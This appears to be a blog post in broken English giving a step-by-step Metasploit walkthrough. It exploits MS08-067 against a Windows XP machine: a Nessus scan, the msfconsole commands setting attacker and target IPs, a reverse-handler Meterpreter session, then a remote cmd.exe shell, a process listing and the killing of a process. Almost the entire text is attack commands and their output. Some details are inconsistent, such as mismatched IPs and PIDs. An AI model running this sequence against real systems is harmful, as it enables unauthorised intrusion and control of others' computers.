we start only manner work....
there is two manneer for execute exploits : first we scan with nessus for see port open pass
and we select SVC Name which smb
after that double click
after that we start with open konsole pass we clik msfconsole.
after that we click
msf > use
windows/smb/ms08_067_netapi(enter)
this is beginning from scan port in nessus after that
this is IP which my wear:
msf exploit(ms08_067_netapi) > set
lhost 192.168.1.141(enter)
lhost => 192.168.1.141
this is be used for ip attacker
msf exploit(ms08_067_netapi) > set
rhost 192.168.56.101(enter)
rhost => 192.168.56.101
this is be used for ip target
msf exploit(ms08_067_netapi) >
exploit(enter)
[*] Started reverse handler on
192.168.56.1:4444
[*] Automatically detecting the
target...
[*] Fingerprint: Windows XP - Service
Pack 3 - lang:English
[*] Selected Target: Windows XP SP3
English (AlwaysOn NX)
[*] Attempting to trigger the
vulnerability...
[*] Sending stage (752128 bytes) to
192.168.56.101
[*] Meterpreter session 1 opened
(192.168.56.1:4444 -> 192.168.56.101:1034) at 2012-01-28 22:43:12
+0700
after that we ticking
meterpreter > execute -f cmd.exe -M
-i(this is order which in wear for entry to target example windows)
Process 504 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>cd..
cd..
C:\WINDOWS>cd..
cd..
C:\>mkdir folder_yogi
mkdir folder_yogi
mkdir is order for make new folder in windows target with name folder_yogi
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
1036 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1076 wscntfy.exe x86 0 L-06E01A37ECAE4\Administrator C:\WINDOWS\system32\wscntfy.exe
1080 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1124 notepad.exe x86 0 L-06E01A37ECAE4\Administrator C:\WINDOWS\system32\notepad.exe
1320 notepad.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\notepad.exe
1436 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1544 explorer.exe x86 0 L-06E01A37ECAE4\Administrator C:\WINDOWS\Explorer.EXE
320 cmd.exe x86 0 L-06E01A37ECAE4\Administrator C:\WINDOWS\system32\cmd.exe
352 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
4 System x86 0 NT AUTHORITY\SYSTEM
456 NOTEPAD.EXE x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\NOTEPAD.EXE
504 cmd.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\cmd.exe
568 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
572 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
592 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
636 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
640 notepad.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\notepad.exe
648 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
744 notepad.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\notepad.exe
812 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
892 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
932 wpabaln.exe x86 0 L-06E01A37ECAE4\Administrator C:\WINDOWS\system32\wpabaln.exe
984 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
ps is order for observe program run in our target
meterpreter > kill 1321
Killing: 1321
Killing: 1321
kill be used for delate program which run in our target
finish
Tidak ada komentar:
Posting Komentar